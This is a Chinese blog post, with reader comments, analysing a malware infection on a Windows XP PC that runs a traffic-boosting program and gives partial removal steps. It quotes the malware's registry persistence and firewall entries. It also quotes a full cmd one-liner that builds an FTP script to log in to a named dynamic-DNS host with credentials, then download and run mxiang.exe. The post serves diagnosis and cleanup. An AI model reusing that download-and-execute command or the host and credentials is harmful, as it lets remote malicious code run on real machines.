一朋友的电脑出了问题,通过远程协助检查,发现是被恶意软件入侵了。该软件在系统中安装了流量精灵,然后通过每隔一段时间从一个 ftp 服务器上下载一个可执行程序来检查和确保流量精灵在运行。目前只是抑制了该恶意软件的行为,但是感染方式和根治方法还没找到。
朋友的电脑是 Windows XP sp3 系统,平常也就看看股票、处理办公文档和浏览新闻网页。大概是四五天前感染上这个恶意软件的。虽然系统里安装了 Symantec Endpoint Protection,可是对这个软件没有反应,我猜想是因为这个软件的行为看起来像是用户自己进行的操作。
1. 该恶意软件组成¶
这个恶意软件会在用户的资料文件夹(即 %APPDATA%
,例如 C:\Documents and Settings\Administrator\Application Data\
目录下)中安装流量精灵,目的估计是增加其个人抢注的大量域名的流量以买个好价钱。流量精灵是一款针对网站站长、个人博客、网络写手、网站推广、网络营销、网店推广等各类 网络从业人员,用于提高网站流量,店铺/商品浏览量,网页PV(访问量),UV(独立访客),IP(独立IP)等的免费网络推广软件。
它会将这个流量精灵软件的主进程 jlguaji.exe
设置为开机自启动项。即在注册表中添加下面的项:
[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'urlspace' = '%APPDATA%\jlguaji.exe -h'
还会添加修改 Windows 防火墙规则以允许该软件访问网络。类似于(下面只是其中一条):
[<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '%TEMP%\jlguaji.exe' = '%TEMP%\jlguaji.exe:*:Enabled:精灵软件'
另外,在 system32 文件夹(一般是 C:\Windows\system32)下还有一个 mxiang.exe
文件。该文件是会每隔一段时间就出来一次的。
因为不知道这个病毒是怎么感染上的,也没有病毒文件,不知道还有其他的什么东西被安装在系统中(肯定还有)。
2. 感染后的症状¶
该病毒(恶意软件)会在系统启动时自动运行,开启流量精灵来挂机。会占用大量的 CPU 和内存资源。
然后每隔一段时间 —— 有时候十三四分钟,有时候二十多分钟 —— 就会通过某个方法来触发 svchost.exe
(在 C:\WINDOWS\System32\
下)进程以调用 C:\WINDOWS\System32\Wbem
目录下的 wmiprvse.exe
进程来启用 ftp。
它会先创建一个记录文件 Ex1.dat
然后通过 ftp 来执行该文件中的内容从 ftp 上下载 mxiang.exe 并执行它:
cmd /c @echo open zuyong.3322.org>>Ex1.dat&@echo myftp>>Ex1.dat&@echo 123654>>Ex1.dat&@echo bin>>Ex1.dat&@echo get mxiang.exe>>Ex1.dat&@echo bye>>Ex1.dat&@ftp -s:Ex1.dat&del Ex1.dat&mxiang.exe&mxiang.exe
写的好看些就是:
cmd /c @echo open zuyong.3322.org>>Ex1.dat @echo myftp>>Ex1.dat @echo 123654>>Ex1.dat @echo bin>>Ex1.dat @echo get mxiang.exe>>Ex1.dat @echo bye>>Ex1.dat @ftp -s:Ex1.dat del Ex1.dat mxiang.exe mxiang.exe
可以看到该 ftp 服务器是用的动态域名 zuyong.3322.org
,访问的 IP 是 203.171.230.41
(查询到的信息是该 IP 属于河南省郑州市 景安计算机网络技术有限公司)。使用上面的信息登录 ftp 可以看到还有几个类似文件,估计都是用来搞小动作的:
Index of / Name Size Date Modified ctffmon.exe 317 kB 8/23/12 3:42:00 PM hfs.exe 598 kB 7/27/12 10:45:00 AM msiexeca.exe 621 kB 7/10/12 2:28:00 PM mxiang.exe 317 kB 8/23/12 3:42:00 PM mysql.exe 317 kB 8/23/12 3:42:00 PM sougou.exe 317 kB 8/23/12 3:42:00 PM svhost.exe 317 kB 8/23/12 3:43:00 PM
mxiang.exe 运行的时候会出错,信息如下:
mxiang.exe - 应用程序错误 "0x004012ed" 指令引用的 "0x0000000c" 内存。该内存不能为 "read"。 要终止程序,请单击“确定”。 要调试程序,请单击“取消”。
如果没有上面的错误提示,估计这朋友也不会觉得有问题而找我。
3. 解决办法¶
解决办法请参考文后评论:用冰刃或者Xuetr直接删掉。我未做测试,无法提供更详细的信息。
感谢 FROYO 童鞋提供方法。
目前还没找到彻底的解决办法,因为不知道该病毒是通过什么方法来启动上面介绍的 ftp 远程下载文件过程的。所以我只能:
- 使用记事本编辑 \windows\system32\mxiang.exe 文件,将其内容清空后保存,然后编辑该文件的 属性 ——> 安全,将其权限针对所有用户和用户组都设置为“禁止”;
- 清理 jlguaji.exe 的开机自启动项;
- 将
%APPDATA%
目录下的流量精灵文件夹(忘记文件夹名称了)内的东西全部删除,然后编辑该文件夹的 属性 ——> 安全,将其权限针对所有用户和用户组都设置为“禁止”。
找到彻底的解决方案之后我会再更新此文。同时希望有经验的朋友提供解决方法。©
本文发表于水景一页。永久链接:<http://cnzhx.net/blog/a-malicious-soft-mxiang/>。转载请保留此信息及相应链接。
这软件很呕心呢..赶紧杀之.
是啊,可惜还不知道怎么彻底搞定它。
封IP
封 IP 也解决不了根本问题,不知道是通过什么方式来启动 ftp 下载的。
博主请联系我一下,我这也发现类似问题,服务器上被人挂流量精灵,并且是在为一个黄沾刷流量。郁闷之极
你的是 Windows 服务器?我现在也是没找到根治的方法啊。你可以按照文中的方法试试看屏蔽它的通信服务器,然后再清除这几个文件,算是治标不治本的方法吧。
我也有一台服务器中招了 郁闷了
现在使用了博主治标的方法
如果博主有什么好方法敬请告知
貌似治标之后一段时间就没问题了,猜测其启动与定期自动下载的那个文件有关。你也可以观察观察。
如果有好方法了会给你留言的。
给博主提供个线索。我用的是“技术员联盟”的64位ghost版的win7系统,也有这样的情况。并且很奇怪。我在学校用移动的(铁通)网络就没有事。一旦连接到电信网 ,马上中招
因为是在别人的电脑上发现的,后来就没有再接触了。谢谢你提供的信息!
用冰刃或者Xuetr直接删掉就可以
谢谢,因为后来没机会再弄,就给忘记这件事儿了 :)
我也遇到這個惡意軟件
也去下載了冰刃跟Xuetr
但是關鍵在於 不知道要刪除哪一個自動啟動的程式
这个基本上是需要慢慢试的吧